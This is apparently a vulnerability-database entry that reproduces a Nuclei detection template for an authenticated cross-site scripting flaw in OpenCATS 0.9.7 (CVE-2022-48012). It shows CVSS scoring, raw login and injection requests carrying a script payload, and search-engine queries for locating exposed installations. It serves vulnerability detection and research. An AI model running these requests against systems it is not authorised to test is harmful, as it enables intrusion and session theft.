Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-48012
HistoryMar 31, 2023 - 11:28 a.m.

OpenCATS 0.9.7 - Cross-Site Scripting

2023-03-3111:28:24
ProjectDiscovery
github.com
cve-2022
cross-site scripting
opencats
authenticated

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.0%

OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2022-48012

info:
  name: OpenCATS 0.9.7 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
  reference:
    - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities
    - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities/blob/main/Opencats-0.9.7-Reflected%20XSS%20in%20onChangeTag.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-48012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-48012
    cwe-id: CWE-79
    epss-score: 0.00112
    epss-percentile: 0.43742
    cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: opencats
    product: opencats
    shodan-query:
      - title:"opencats"
      - http.title:"opencats"
    fofa-query: title="opencats"
    google-query: intitle:"opencats"
  tags: cve,cve2022,xss,opencats,authenticated

http:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /index.php?m=login&a=attemptLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        tag_title=<script>alert(document.domain);</script>

    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "opencats - Login")
          - contains(body_3, "<script>alert(document.domain);</script>")
        condition: and
# digest: 490a00463044022051bf7514694de8c15b38303d40390063ef2e520503767afd105126c0b20e1090022007526951bb98b9e8af545d741f3e95517f6932b106b84ffbcda79c53600dd610:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.0%

Related for NUCLEI:CVE-2022-48012